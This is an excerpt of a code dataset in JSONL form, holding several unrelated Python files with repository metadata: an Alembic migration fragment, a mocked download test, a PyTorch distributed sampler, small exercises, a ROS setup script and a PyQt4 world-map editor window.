adjust! ###\n op.add_column('appointments', sa.Column('appointment', postgresql.TIMESTAMP(), autoincrement=False, nullable=False))\n op.drop_column('appointments', 'time')\n op.drop_column('appointments', 'date')\n # ### end Alembic commands ###\n","repo_name":"frances-y-h/yillow","sub_path":"migrations/versions/20220608_141645_.py","file_name":"20220608_141645_.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22105011828","text":"from test_base import *\nfrom sure import expect\nimport httpretty\n\nclass DownloadTestCase(unittest.TestCase):\n \n def setUp(self):\n self.token = '12345'\n self.myhost = 'http://somehost'\n self.initial_config_state = config.load()\n hiev.set_token(self.token)\n hiev.set_host(self.myhost)\n \n def tearDown(self):\n config.reload(self.initial_config_state)\n\n # define callback function\n def request_callback(self, request, uri, headers):\n #print(uri)\n self.assertEqual(uri, self.expected_uri) \n return (200, headers, 'Success\\n') \n \n @httpretty.activate\n def test_download(self):\n import json\n fileid = 137\n filename = 'returned.txt'\n j = json.dumps([{'file_id': fileid, 'filename': filename}])\n metadata = json.loads(j)\n download_fragment = hiev.DOWNLOAD_FILE_URL_FRAGMENT % fileid\n url = '%s/%s' % (self.myhost, download_fragment) \n self.expected_uri = '%s?auth_token=12345' % url\n httpretty.register_uri(httpretty.GET, url, body=self.request_callback)\n dest = '/tmp'\n hiev.download(metadata, dest)\n f = '%s/%s' % (dest, filename)\n file_exists(f)\n os.remove(f)\n \n ","repo_name":"IntersectAustralia/divermodc","sub_path":"notebook/tests/test_download.py","file_name":"test_download.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30520087648","text":"import torch\nfrom torch.utils.data.distributed import DistributedSampler\n#import random\n#import numpy as np\nimport math\nimport torch\nimport torch.distributed as dist\nclass ShuffleDistributedSampler(DistributedSampler):\n \"\"\"Sampler that restricts data loading to a subset of input sampler indices.\n\n It is especially useful in conjunction with\n :class:`torch.nn.parallel.DistributedDataParallel`. In such case, each\n process can pass a DistributedSampler instance as a DataLoader sampler,\n and load a subset of the original dataset that is exclusive to it.\n\n .. note::\n Input sampler is assumed to be of constant size.\n\n Arguments:\n sampler: Input data sampler.\n num_replicas (optional): Number of processes participating in\n distributed training.\n rank (optional): Rank of the current process within num_replicas.\n \"\"\"\n\n def __init__(self, dataset_len=None, num_replicas=None, rank=None, seed=0, drop_last=True,shuffle=True):\n #super(ShuffleDistributedSampler, self).__init__(sampler, num_replicas=num_replicas, rank=rank, shuffle=True)\n #self.sampler = sampler\n self.dataset_len = dataset_len\n\n if num_replicas is None:\n if not dist.is_available():\n raise RuntimeError(\"Requires distributed package to be available\")\n num_replicas = dist.get_world_size()\n if rank is None:\n if not dist.is_available():\n raise RuntimeError(\"Requires distributed package to be available\")\n rank = dist.get_rank()\n if rank >= num_replicas or rank < 0:\n raise ValueError(\n \"Invalid rank {}, rank should be in the interval\"\n \" [0, {}]\".format(rank, num_replicas - 1))\n\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.drop_last = drop_last\n # If the dataset length is evenly divisible by # of replicas, then there\n # is no need to drop any data, since the dataset will be split equally.\n if dataset_len is not None:\n self.dataset_len = dataset_len\n elif self.dataset is not None:\n self.dataset_len = len(self.dataset)\n else:\n raise RuntimeError(\"Length of the dataset is unknown.\")\n\n if self.drop_last and self.dataset_len % self.num_replicas != 0: # type: ignore\n # Split to nearest available length that is evenly divisible.\n # This is to ensure each rank receives the same amount of data when\n # using this Sampler.\n self.num_samples = math.ceil(\n # `type:ignore` is required because Dataset cannot provide a default __len__\n # see NOTE in pytorch/torch/utils/data/sampler.py\n (self.dataset_len - self.num_replicas) / self.num_replicas # type: ignore\n )\n else:\n self.num_samples = math.ceil(self.dataset_len / self.num_replicas) # type: ignore\n self.total_size = self.num_samples * self.num_replicas\n self.shuffle = shuffle\n self.seed = seed\n \n def __iter__(self):\n if self.shuffle:\n # deterministically shuffle based on epoch and seed\n g = torch.Generator()\n g.manual_seed(self.seed + self.epoch)\n indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n #seed = self.seed + self.epoch\n #random.seed(seed)\n #print('Epoch: ', self.epoch, 'Indices: ',indices)\n #print('Seed: ', seed, 'Indices before: ',indices)\n #random.shuffle(indices) # guarantee that use different images for each epoch \n #print('Seed: ', seed, 'Indices after: ',indices)\n else:\n indices = list(range(self.dataset_len)) # type: ignore\n\n if not self.drop_last:\n # add extra samples to make it evenly divisible\n padding_size = self.total_size - len(indices)\n if padding_size <= len(indices):\n indices += indices[:padding_size]\n else:\n indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n else:\n # remove tail of data to make it evenly divisible.\n indices = indices[:self.total_size]\n assert len(indices) == self.total_size\n \n # subsample\n indices = indices[self.rank:self.total_size:self.num_replicas]\n assert len(indices) == self.num_samples\n #print('Epoch: ', self.epoch, ', Rank: ',self.rank, ' ', indices)\n return iter(indices)\n\n def get_indices(self):\n if self.shuffle:\n # deterministically shuffle based on epoch and seed\n g = torch.Generator()\n g.manual_seed(self.seed + self.epoch)\n if self.dataset_len is None:\n indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n else:\n indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n else:\n indices = list(range(self.dataset_len)) # type: ignore\n\n if not self.drop_last:\n # add extra samples to make it evenly divisible\n padding_size = self.total_size - len(indices)\n if padding_size <= len(indices):\n indices += indices[:padding_size]\n else:\n indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n else:\n # remove tail of data to make it evenly divisible.\n indices = indices[:self.total_size]\n assert len(indices) == self.total_size\n\n # subsample\n indices = indices[self.rank:self.total_size:self.num_replicas]\n assert len(indices) == self.num_samples\n # print('Epoch: ', self.epoch, ', Rank: ',self.rank, ' ', indices)\n return indices\n","repo_name":"Cvpr2022ID5164/CVPR2022-ID5164","sub_path":"gaml/ShuffleDistributedSampler.py","file_name":"ShuffleDistributedSampler.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19983279597","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass Person:\n name: str \n age: int\n\n def __post_init__(self):\n print(self.name)\n print(self.age)\n\n\ntest_person = Person(\"test_person_name\", 23)\nprint(repr(test_person))\n","repo_name":"DavidGugea/Mastering-Object-Oriented-Python-Programming","sub_path":"Section1/Chapter4/TutorialsAndTests/test16.py","file_name":"test16.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11544278956","text":"from glob import glob\nimport os\n\nfrom setuptools import setup\n\npackage_name = 'rm_decision'\n\nsetup(\n name=package_name,\n version='1.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name), glob('launch/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='LihanChen',\n maintainer_email='1120220476@smbu.edu.cn',\n description='A decision package for RMUC/RMYC sentinel robots implemented based on a finite state machine',\n license='MIT',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'pb_auto_fsm = rm_decision.pb_auto_fsm:main',\n ],\n },\n)\n","repo_name":"LihanChen2004/PB_RMSimulation","sub_path":"src/rm_decision/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21664107315","text":"# Problem Link : https://leetcode.com/problems/search-in-rotated-sorted-array/\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n if not len(nums):\n return -1\n left = 0\n right = len(nums) - 1\n while left < right:\n mid = left + int((right - left) / 2)\n if nums[mid] > nums[right]:\n left = mid + 1\n else:\n right = mid\n # print(left, nums[left])\n start = left\n left = 0\n right = len(nums) - 1\n if target >= nums[start] and target <= nums[right]:\n left = start\n else:\n right = start\n while left <= right:\n mid = left + int((right - left) / 2)\n # print(mid, nums[mid])\n if nums[mid] == target:\n return mid\n elif target > nums[mid]:\n left = mid + 1\n else:\n right = mid - 1\n return -1","repo_name":"vidhikhathuria/30-DayLeetcodingChallenge","sub_path":"leetcode0305.py","file_name":"leetcode0305.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16153631550","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui\nfrom PyQt4 import QtCore\nfrom gui.menu import menu\nfrom gui.newmapdialog import newMapDialog\nfrom gui.exportmapdialog import exportMapDialog\nfrom gui.specieslistdialog import speciesListDialog\nfrom gui.form.placedialog import formPlaceDialog\nfrom gui.form.npcdialog import formNpcDialog\nfrom gui.list.placeslist import placesList\nfrom gui.list.npclist import npcList\nfrom core import worker, config, color\nfrom core.localisation import _\nimport imghdr\nimport os\n\n\nclass mainWindow(QtGui.QMainWindow):\n\t\"\"\"\n\tClass for the main window of the application.\n\t\"\"\"\n\n\t_imageScene = None\n\t_scrollArea = None\n\t_scaleFactor = 1.0\n\n\t_isRecording = False\n\n\t_selectPixelEvent = QtCore.pyqtSignal(int, int)\n\t_selectedCellRect = None\n\t_pixmaps = dict()\n\n\t_placesWidget = None\n\t_npcWidget = None\n\t_recordingLabel = None\n\n\t_thread = None\n\n\t_selectCellSpecificAction = None\n\n\tdef __init__(self, app):\n\t\t\"\"\"\n\t\tClass's construct.\n\n\t\t@param app QtGui.QApplication Application containing the window.\n\t\t\"\"\"\n\t\tsuper(mainWindow, self).__init__()\n\t\tself._app = app\n\t\tself.addWidget = None\n\t\t#creation of the UI\n\t\tself.initUI()\n\t\tself.initSignals()\n\n\tdef initUI(self):\n\t\t\"\"\"\n\t\tInitialization of the UI:\n\t\t- creation of the menu bar,\n\t\t- creation of the status bar,\n\t\t- creation of the window's content,\n\t\t- definition of the window informations (size, position),\n\t\t- display of the window.\n\t\t\"\"\"\n\t\t#top menu\n\t\tself.setMenuBar(menu(self))\n\t\tself.setStatusBar(QtGui.QStatusBar())\n\t\t#creation fo the window\n\t\tself._create()\n\t\t#definition if window informations (size, position, title)\n\t\tself._setWindowInfos()\n\t\t#display the Whole Thing\n\t\tself.show()\n\n\tdef initSignals(self):\n\t\t\"\"\"\n\t\tMethod which initialise some signals.\n\t\tFor the moment, the only signal is the application's mapOpened,\n\t\ttriggered when a map file is opened. At this moment, the places' widget\n\t\tis populated to list the existing places.\n\t\t\"\"\"\n\t\tself._app.mapOpened.connect(self._placesWidget.setData)\n\t\tself._app.mapOpened.connect(self._npcWidget.setData)\n\n\tdef _create(self):\n\t\t\"\"\"\n\t\tMethod which create the UI\n\t\tThe window elements are created here.\n\t\tFor the moment, the window contains only a QGraphicsView displaying the\n\t\tworld's map.\n\t\t\"\"\"\n\t\tsplitter = QtGui.QSplitter()\n\t\tsplitter.setOrientation(QtCore.Qt.Orientation(QtCore.Qt.Horizontal))\n\n\t\tself._placesWidget = placesList(self, self._app)\n\t\tself._placesWidget.entityDeleted.connect(self.refreshEntity)\n\t\tself._placesWidget.entityDeleted.connect(self._app.flagAsUnsaved)\n\t\tself._placesWidget.cellDoubleClicked.connect(self.editPlace)\n\t\tself._npcWidget = npcList(self, self._app)\n\t\tself._npcWidget.entityDeleted.connect(self.refreshEntity)\n\t\tself._npcWidget.entityDeleted.connect(self._app.flagAsUnsaved)\n\t\tself._npcWidget.cellDoubleClicked.connect(self.editNpc)\n\n\t\ttabWidget = QtGui.QTabWidget()\n\t\ttabWidget.addTab(self._placesWidget, _('PLACES_TAB'))\n\t\ttabWidget.addTab(self._npcWidget, _('NPC_TAB'))\n\n\t\tself._imageScene = QtGui.QGraphicsScene()\n\t\tself._imageView = QtGui.QGraphicsView()\n\t\tself._imageView.setScene(self._imageScene)\n\n\t\tlayout = QtGui.QVBoxLayout()\n\t\tlayout.setSpacing(0)\n\t\tlayout.setMargin(0)\n\n\t\tmessageLayout = QtGui.QHBoxLayout()\n\t\tmessageLayout.setSpacing(4)\n\t\tmessageLayout.setMargin(3)\n\t\tviewTopWidget = QtGui.QWidget()\n\t\tself._recordingLabel = QtGui.QLabel(\"\")\n\t\tmessageLayout.addWidget(self._recordingLabel)\n\t\tviewTopWidget.setLayout(messageLayout)\n\n\t\tlayout.addWidget(viewTopWidget)\n\t\tlayout.addWidget(self._imageView)\n\n\t\tviewWidget = QtGui.QWidget()\n\t\tviewWidget.setLayout(layout)\n\n\t\tsplitter.addWidget(tabWidget)\n\t\tsplitter.addWidget(viewWidget)\n\t\tsplitter.setStretchFactor(1, 1)\n\n\t\tself.setCentralWidget(splitter);\n\n\tdef _setWindowInfos(self):\n\t\t\"\"\"\n\t\tDefine window informations\n\t\t\"\"\"\n\t\t# default size\n\t\tself.setGeometry(300, 300, 600, 600)\n\t\tself.setWindowTitle(_('MAIN_WINDOW_TITLE'))\n\n\tdef displayMessage(self, text):\n\t\t\"\"\"\n\t\tDisplays a message in the status bar.\n\t\t\"\"\"\n\t\tself.statusBar().showMessage(text)\n\n\tdef alert(self, message):\n\t\t\"\"\"\n\t\tMethod to display an alert message. Create just an critical QMessageBox.\n\t\t\"\"\"\n\t\tQtGui.QMessageBox.critical(self, _('ERROR_BOX_TITLE'), message)\n\n# Actions\n\tdef newMapAction(self):\n\t\t\"\"\"\n\t\tAction triggered when the menu's \"new\" button is pressed.\n\t\tThe user is then invited to select a map name and size.\n\t\t\"\"\"\n\t\tnewmap = newMapDialog(self, self._app)\n\n\tdef openMapAction(self):\n\t\t\"\"\"\n\t\tAction triggered when the menu's \"open\" button is pressed.\n\t\tThe user is then invited to select a map on his computer. The map must\n\t\tbe a picture file.\n\t\t\"\"\"\n\t\tfileName = QtGui.QFileDialog.getOpenFileName(\n\t\t\tself,\n\t\t\t_('OPEN_FILE_DIALOG_TITLE'),\n\t\t\tQtCore.QDir.currentPath(),\n\t\t\t_('MAP_FILE_TYPE %s') % \"(*.map)\"\n\t\t)\n\n\t\tif fileName == \"\":\n\t\t\treturn\n\n\t\ttry:\n\t\t\tself._app.openMap(fileName)\n\t\t\tself.openMap()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\n\tdef saveMapAction(self):\n\t\t\"\"\"\n\t\tThis method is called when the \"Save\" button from the menu is pressed.\n\t\tIf the map's save file name is set, the map is saved in this file,\n\t\telse the \"Save as\" action is called.\n\t\t\"\"\"\n\t\tif self._app.getSaveFileName() is None:\n\t\t\treturn self.saveMapAsAction()\n\t\telse:\n\t\t\tself._app.saveMap()\n\t\t\treturn True\n\n\tdef saveMapAsAction(self):\n\t\t\"\"\"\n\t\tThis method asks the user to select a file on his computer, and then\n\t\tsave the map in this file.`\n\t\t\"\"\"\n\t\tfileName = QtGui.QFileDialog.getSaveFileName(\n\t\t\tself,\n\t\t\t_('SAVE_FILE_DIALOG_TITLE'),\n\t\t\tQtCore.QDir.currentPath(),\n\t\t\t_('MAP_FILE_TYPE %s') % \"(*.map)\"\n\t\t)\n\n\t\tif fileName == \"\":\n\t\t\treturn False\n\n\t\tif fileName[-4:] != '.map':\n\t\t\tfileName = fileName + '.map'\n\n\t\tself._app.setSaveMapName(fileName)\n\t\tself._app.saveMap()\n\t\treturn True\n\n\tdef listSpeciesAction(self):\n\t\t\"\"\"\n\t\tMethod called to display a dialog listing the map's species.\n\t\t\"\"\"\n\t\tspecieswindow = speciesListDialog(self, self._app)\n\t\tspecieswindow.show()\n\n\tdef zoomInMapAction(self):\n\t\t\"\"\"\n\t\tWrapper method to zoom in the map, calls scaleImage().\n\t\t\"\"\"\n\t\tself._scaleFactor *= 1 + config.zoomDelta\n\t\tself.scaleImage()\n\n\tdef zoomOutMapAction(self):\n\t\t\"\"\"\n\t\tWrapper method to zoom out the map, calls scaleImage().\n\t\t\"\"\"\n\t\tself._scaleFactor *= 1 - config.zoomDelta\n\t\tself.scaleImage()\n\n\tdef exportMapAction(self, customAction=None):\n\t\t\"\"\"\n\t\tMethod to export a map.\n\t\tWill check if the map can be exported, and if it is, the export will be\n\t\trun and a dialog will be displayed with a progress bar to show the\n\t\texport progression.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself._app.map.checkForExport()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\t\t\treturn\n\n\t\texportDialog = exportMapDialog(self)\n\n\t\tself._thread = worker.exporterThread(self._app)\n\t\tif customAction is not None:\n\t\t\tself._thread.finished.connect(customAction)\n\t\tself._thread.finished.connect(exportDialog.close)\n\t\tself._thread.exportError.connect(self.alert)\n\n\t\texportDialog.setThread(self._thread)\n\t\tself._thread.start()\n\n\tdef setAsDefaultAction(self):\n\t\t\"\"\"\n\t\tDefine the map as default map. The map must already be exported.\n\t\tIf the map is not exported, the user is asked to export it.\n\t\t\"\"\"\n\t\tif self._app.isExported() is False:\n\t\t\tmsgBox = QtGui.QMessageBox()\n\t\t\tmsgBox.setWindowTitle(_('SET_AS_DEFAULT_QUESTION'))\n\t\t\tmsgBox.setText(_('ERROR_EXPORT_NEEDED'))\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('YES_BUTTON')), QtGui.QMessageBox.AcceptRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('NO_BUTTON')), QtGui.QMessageBox.RejectRole)\n\t\t\tret = msgBox.exec_()\n\n\t\t\tif ret == QtGui.QMessageBox.AcceptRole:\n\t\t\t\tself.exportMapAction(self._app.setAsDefault)\n\t\t\treturn\n\n\t\tself._app.setAsDefault()\n# End Actions\n\n# Actions to interact on the map to add elements\n\tdef recordSelectStartCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a starting cell. A record mode\n\t\twill be enabled and the user will have to click on a cell in the map.\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.selectStartCell\n\t\tself.enableRecordingMode(_('RECORDING_START_CELL_MESSAGE'))\n\n\tdef recordAddPlaceCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a cell to add a place in the\n\t\tworld. A record mode will be enabled and the user will have to click on\n\t\ta cell in the map\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.addPlace\n\t\tself.enableRecordingMode(_('RECORDING_PLACE_MESSAGE'))\n\n\tdef recordAddNpcCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a cell to add a NPC in the\n\t\tworld. A record mode will be enabled and the user will have to click on\n\t\ta cell in the map\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.addNpc\n\t\tself.enableRecordingMode(_('RECORDING_NPC_MESSAGE'))\n# End Actions to interact on the map to add elements\n\n# Recording methods\n\tdef isRecording(self):\n\t\t\"\"\"\n\t\tMethod to know if the recording mode is enabled.\n\t\t\"\"\"\n\t\treturn self._isRecording\n\n\tdef enableRecordingMode(self, message):\n\t\t\"\"\"\n\t\tMethod to enable the recording mode.\n\t\t\"\"\"\n\t\tself._isRecording = True\n\t\tself._recordingLabel.setText(message)\n\t\tself._selectPixelEvent.connect(self.selectCell)\n\n\t\tif self._selectCellSpecificAction is not None:\n\t\t\tself._selectPixelEvent.connect(self._selectCellSpecificAction)\n\n\n\tdef disableRecordingMode(self):\n\t\t\"\"\"\n\t\tMethod to disable the recording mode.\n\t\t\"\"\"\n\t\tself._isRecording = False\n\t\tself._recordingLabel.setText(\"\")\n\t\tif self._selectCellSpecificAction is not None:\n\t\t\tself._selectPixelEvent.disconnect(self._selectCellSpecificAction)\n\t\t\tself._selectCellSpecificAction = None\n\t\tself._selectPixelEvent.disconnect(self.selectCell)\n\n# End Recording methods\n\n# Map operations\n\tdef openMap(self):\n\t\t\"\"\"\n\t\tMethod to open a map from a filename\n\t\t\"\"\"\n\t\tfileName = self._app.getMapFileName() + '.bmp'\n\n\t\timage = QtGui.QImage(fileName)\n\t\tif image is None or imghdr.what(str(fileName)) != \"bmp\":\n\t\t\tQtGui.QMessageBox.information(\n\t\t\t\tself,\n\t\t\t\t_('IMAGE_VIEWER'),\n\t\t\t\t_('ERROR_OPEN_%s') % (fileName)\n\t\t\t)\n\t\t\treturn\n\n\t\tself._imageScene.clear()\n\t\tmapPixmap = QtGui.QPixmap.fromImage(image)\n\t\tmapPixmap = QtGui.QGraphicsPixmapItem(mapPixmap, None, self._imageScene)\n\t\tmapPixmap.mousePressEvent = self.pixelSelect\n\n\t\tself._pixmaps = dict()\n\t\tself._pixmaps['map'] = mapPixmap\n\n\t\tself.refreshEntities()\n\n\t\tif self._app.map.startCellPosition is not None:\n\t\t\tself.displayStartCell(self._app.map.startCellPosition[0], self._app.map.startCellPosition[1])\n\n\t\tself._scaleFactor = 1.0\n\n\t\tself.menuBar().mapOpened.emit()\n\n\t\tif self._app.getSaveFileName() is None:\n\t\t\tself._app.flagAsUnsaved()\n\n\tdef scaleImage(self):\n\t\t\"\"\"\n\t\tMethod to resize the map after a zoom action.\n\t\tOnce the map is resized, if the scale factor is lower or equal than\n\t\t0.75, the zoom out button is disabled and if the scale factor is higher\n\t\tor equal than 30.0, the zoom in button is disabled.\n\t\t\"\"\"\n\t\tself._imageView.resetTransform()\n\t\ttransform = self._imageView.transform()\n\t\ttransform.scale(self._scaleFactor, self._scaleFactor)\n\t\tself._imageView.setTransform(transform)\n\n\t\tself.menuBar().mapZoomed.emit(self._scaleFactor)\n\n\tdef pixelSelect(self, event):\n\t\t\"\"\"\n\t\tAction called when the map is clicked, to get the clicked pixel.\n\t\t\"\"\"\n\t\t(x, y) = (int(event.pos().x()), int(event.pos().y()))\n\t\tself._selectPixelEvent.emit(x, y)\n\n\tdef centerMapOnCoordinates(self, coordinates):\n\t\t\"\"\"\n\t\tThis method does a maximum zoom on a selected cell of the map.\n\t\t\"\"\"\n\t\tself._imageView.fitInView(coordinates[0] - 1, coordinates[1] - 1, 3, 3)\n\t\tself._scaleFactor = config.scaleFactor\n\t\tself.scaleImage()\n\n\tdef selectCell(self, x, y):\n\t\t\"\"\"\n\t\tThis method is called when the record mode is enabled and a cell of\n\t\tthe map is clicked. At this moment, the cell is highlighted with a\n\t\tblack border arround it.\n\t\t\"\"\"\n\t\tif self._selectedCellRect is not None:\n\t\t\tself.unselectCell()\n\n\t\tself._selectedCellRect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\tself._selectedCellRect.setBrush(QtGui.QBrush(color.getColorFromConfig('selected-cell', color.COLOR_BRUSH)))\n\t\tself._selectedCellRect.setPen(QtGui.QPen(color.getColorFromConfig('selected-cell', color.COLOR_PEN)))\n\n\tdef unselectCell(self):\n\t\t\"\"\"\n\t\tMethod to remove the pixel of the previously selected cell.\n\t\t\"\"\"\n\t\tself._imageScene.removeItem(self._selectedCellRect)\n\t\tself._selectedCellRect = None\n# End Map operations\n\n# Methods to add elements on the map\n\tdef selectStartCell(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to select a\n\t\tstarting cell.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself._app.map.setStartCellPosition((x, y))\n\t\t\tself.displayStartCell(x, y)\n\t\t\tself._app.flagAsUnsaved()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\t\t\treturn\n\n\t\tself.disableRecordingMode()\n\n\tdef addPlace(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to add a place.\n\t\t\"\"\"\n\n\t\tif not self._app.map.isCellOnLand((x, y)):\n\t\t\tself.alert(_('ERROR_PLACE_IN_WATER'))\n\t\t\treturn\n\n\t\tdialog = formPlaceDialog(self, self._app, coordinates=(x, y))\n\t\tdialog.entityAdded.connect(self.unselectCell)\n\t\tdialog.entityAdded.connect(self.displayEntity)\n\t\tdialog.entityAdded.connect(self._placesWidget.setData)\n\t\tdialog.entityAdded.connect(self._app.flagAsUnsaved)\n\n\t\tself.disableRecordingMode()\n\n\tdef editPlace(self, place):\n\t\t\"\"\"\n\t\tMethod called when the user double clicks on a place in the list.\n\t\t\"\"\"\n\t\trow = self._placesWidget.getRowValues(place)\n\t\tself.selectCell(row['x'], row['y'])\n\t\tdialog = formPlaceDialog(self, self._app, row=row)\n\t\tdialog.entityUpdated.connect(self.unselectCell)\n\t\tdialog.entityUpdated.connect(self.refreshEntity)\n\t\tdialog.entityUpdated.connect(self._placesWidget.setData)\n\t\tdialog.entityUpdated.connect(self._app.flagAsUnsaved)\n\n\tdef addNpc(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to add a NPC.\n\t\t\"\"\"\n\t\tif not self._app.map.isCellOnLand((x, y)):\n\t\t\tself.alert(_('ERROR_NPC_IN_WATER'))\n\t\t\treturn\n\n\t\tdialog = formNpcDialog(self, self._app, coordinates=(x, y))\n\t\tdialog.entityAdded.connect(self.unselectCell)\n\t\tdialog.entityAdded.connect(self.displayEntity)\n\t\tdialog.entityAdded.connect(self._npcWidget.setData)\n\t\tdialog.entityAdded.connect(self._app.flagAsUnsaved)\n\n\t\tself.disableRecordingMode()\n\n\tdef editNpc(self, npc):\n\t\t\"\"\"\n\t\tMethod called when the user double clicks on a npc in the list.\n\t\t\"\"\"\n\t\trow = self._npcWidget.getRowValues(npc)\n\t\tself.selectCell(row['x'], row['y'])\n\t\tdialog = formNpcDialog(self, self._app, row=row)\n\t\tdialog.entityUpdated.connect(self.unselectCell)\n\t\tdialog.entityUpdated.connect(self.refreshEntity)\n\t\tdialog.entityUpdated.connect(self._npcWidget.setData)\n\t\tdialog.entityUpdated.connect(self._app.flagAsUnsaved)\n# End Methods to add elements on the map\n\n# Methods to display an element on the map\n\tdef refreshEntities(self):\n\t\tfor e in self._app.map.entities.keys():\n\t\t\tself.refreshEntity(e)\n\n\tdef refreshEntity(self, entityType):\n\t\tentityType = str(entityType)\n\t\tif entityType in self._pixmaps.keys():\n\t\t\tself._cleanScene(self._pixmaps[entityType])\n\t\t\tdel self._pixmaps[entityType]\n\t\tfor p in self._app.map.entities[entityType].values():\n\t\t\tself.displayEntity(entityType, p['x'], p['y'])\n\n\tdef displayEntity(self, entityType, x, y):\n\t\t\"\"\"\n\t\tThis method creates a pixmap in the map for each desired entity of the map.\n\t\t\"\"\"\n\t\tentityType = str(entityType)\n\t\tif entityType not in self._pixmaps.keys():\n\t\t\tself._pixmaps[entityType] = list()\n\n\t\trect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\trect.setBrush(QtGui.QBrush(color.getColorFromConfig(entityType, color.COLOR_BRUSH)))\n\t\trect.setPen(QtGui.QPen(color.getColorFromConfig(entityType, color.COLOR_PEN)))\n\t\tself._pixmaps[entityType].append(rect)\n\n\tdef _cleanScene(self, pixmapsList):\n\t\tfor p in pixmapsList:\n\t\t\tself._imageScene.removeItem(p)\n\n\tdef displayStartCell(self, x, y):\n\t\t\"\"\"\n\t\tHere the start cell is displayed in the map, as a new pixmap\n\t\t\"\"\"\n\t\tif 'start-cell' in self._pixmaps.keys():\n\t\t\tself._imageScene.removeItem(self._pixmaps['start-cell'])\n\t\t\tself._pixmaps['start-cell'] = None\n\n\t\trect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\trect.setBrush(QtGui.QBrush(color.getColorFromConfig('start-cell', color.COLOR_BRUSH)))\n\t\trect.setPen(QtGui.QPen(color.getColorFromConfig('start-cell', color.COLOR_PEN)))\n\t\tself._pixmaps['start-cell'] = rect\n# End Methods to display an element on the map\n\n\tdef exit(self):\n\t\t\"\"\"\n\t\tOn exit, if the map is not saved, the user is prompted to save it or\n\t\tcancel or discard the changes\n\t\t\"\"\"\n\t\tif self._app.hasUnsavedChanges():\n\t\t\tmsgBox = QtGui.QMessageBox()\n\t\t\tmsgBox.setWindowTitle(_('UNSAVED_CHANGES'))\n\t\t\tmsgBox.setText(_('CLOSE_WITH_UNSAVED_CHANGES'))\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('SAVE_BUTTON')), QtGui.QMessageBox.AcceptRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('DISCARD_BUTTON')), QtGui.QMessageBox.DestructiveRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('CANCEL_BUTTON')), QtGui.QMessageBox.RejectRole)\n\t\t\tret = msgBox.exec_()\n\n\t\t\t# This is not logical, I would have expected to have to use\n\t\t\t# RejectRole, but this one seems to do the job...\n\t\t\tif ret == QtGui.QMessageBox.DestructiveRole:\n\t\t\t\treturn\n\t\t\telif ret == QtGui.QMessageBox.AcceptRole and self.saveMapAction() is False:\n\t\t\t\treturn\n\t\tQtGui.qApp.quit()\n","repo_name":"rrpg/world-editor","sub_path":"gui/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":17158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25312952434","text":"#!/bin/python3\nimport sys\n\"\"\"\n# Description\n# \n# Given a sequence of integers as an array, determine whether it is possible to\n# obtain a strictly increasing sequence by removing no more than one element \n# from the array.\n#\n# Example:\n# \n# For sequence = [1, 3, 2, 1], the output should be\n# almostIncreasingSequence(sequence) = false;\n#\n# There is no one element in this array that can be removed in order to get a \n# strictly increasing sequence.\n#\n# For sequence = [1, 3, 2], the output should be\n# almostIncreasingSequence(sequence) = true.\n#\n# You can remove 3 from the array to get the strictly increasing sequence \n# [1, 2]. 